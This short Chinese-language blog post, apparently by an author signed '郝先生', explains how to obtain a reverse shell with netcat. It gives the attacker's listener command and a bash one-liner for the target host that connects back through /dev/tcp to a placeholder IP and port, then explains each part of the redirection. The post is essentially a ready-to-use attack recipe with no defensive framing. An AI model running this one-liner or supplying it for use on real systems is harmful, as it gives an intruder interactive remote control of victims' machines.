nc 反弹shell

攻击者主机上执行监听:
nc -lvvp port

目标主机上执行:
bash -i >& /dev/tcp/x.x.x.x/port 0>&1

简单解释下:

bash -i   打开一个交互的bash  
>&   将标准错误输出重定向到标准输出
/dev/tcp/x.x.x.x/port   意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口
0>&1   标准输入重定向到标准输出,实现你与反弹出来的shell的交互  

郝先生

继续阅读此作者的更多文章